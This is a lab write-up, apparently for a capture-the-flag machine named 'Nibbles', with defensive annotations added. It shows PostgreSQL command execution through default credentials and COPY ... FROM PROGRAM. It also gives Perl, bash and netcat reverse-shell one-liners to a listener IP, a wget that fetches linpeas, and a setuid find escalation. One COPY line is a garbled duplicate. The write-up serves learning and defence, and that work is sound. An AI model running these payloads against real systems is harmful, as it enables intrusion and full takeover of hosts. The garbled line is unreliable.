Nibbles
PostgreSQL was using default credentials.
We can try this PoC:
#PoC
-- Scratch table for capturing the stdout of a server-side program.
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
-- COPY ... FROM PROGRAM runs the command as the OS user of the database server
-- process. It is restricted to superusers and members of
-- pg_execute_server_program (PostgreSQL 11+), so the root cause here is the
-- default/weak superuser credentials, not COPY itself. Defenders: keep
-- superuser roles off network-reachable logins, and log/alert on
-- COPY ... PROGRAM statements (log_statement or pgAudit).
COPY cmd_exec FROM PROGRAM 'id';
-- Default text COPY format: each output line of the program becomes one row.
SELECT * FROM cmd_exec;
-- Clean up the scratch table.
DROP TABLE IF EXISTS cmd_exec;
#Reverse shell
#Notice that in order to escape a single quote inside the SQL string literal you need to write two single quotes
-- Same COPY ... FROM PROGRAM primitive as the PoC above, but the program is a
-- Perl one-liner that forks, connects back to 192.168.49.115:4444 and executes
-- what it reads from that socket. The doubled '' inside the literal are SQL
-- quote escaping (see the note above).
-- NOTE(review): this targets a table named "files", which is not created
-- anywhere in this note; the PoC above used cmd_exec — presumably one or the
-- other was meant.
-- Defenders: the connection is initiated by a child of the postgres server
-- process. Egress filtering from database hosts and alerting on postgres
-- spawning perl/sh both catch this.
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.49.115:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
# Two alternative reverse-shell one-liners for the same listener host: the first
# relies on bash's /dev/tcp pseudo-device, the second pipes an interactive sh
# through netcat. Detection: an interactive shell whose stdio is attached to a
# network socket, spawned under a service account, is a high-signal alert.
bash -i >& /dev/tcp/192.168.49.115/4242 0>&1
/bin/sh -i 2>&1|nc 192.168.49.115 4444
-- NOTE(review): mis-encoded duplicate of the COPY statement above — every quote
-- character was replaced by 'β' during extraction, so this line is not valid SQL
-- as written. Refer to the version a few lines up.
COPY files FROM PROGRAM βperl -MIO -e ββ$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,β192.168.49.115:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;βββ;
Postgres Reverse Shell https://github.com/squid22/PostgreSQL_RCE/blob/main/postgresql_rce.py
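# Fetch the linpeas enumeration script from the listener host's web server.
# wget's lowercase -o names the LOG file, not the download; with -o the log was
# written to linpeas.sh and the script itself was saved under the URL basename
# (likely as linpeas.sh.1, since linpeas.sh already existed). -O (uppercase)
# names the downloaded document, which is what was intended.
# Defender note: outbound HTTP from a database host to a non-standard port, and a
# newly written script in a world-writable location, are both worth alerting on.
wget http://192.168.49.115:5000/linpeas.sh -O linpeas.sh --tries 1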
After running linpeas, I found that the SUID bit is set on find.
https://gtfobins.github.io/gtfobins/find/
# Privilege escalation through the setuid find binary (GTFOBins entry linked
# above): -exec makes find spawn a shell that inherits the elevated effective
# UID. The -p variant matters when /bin/sh is bash, which otherwise drops the
# effective UID on startup.
# Mitigation: find has no legitimate need for the setuid bit — remove it
# (chmod u-s) and alert on setuid binaries spawning shells.
./find . -exec /bin/sh - \; -quit
./find . -exec /bin/sh -p \; -quit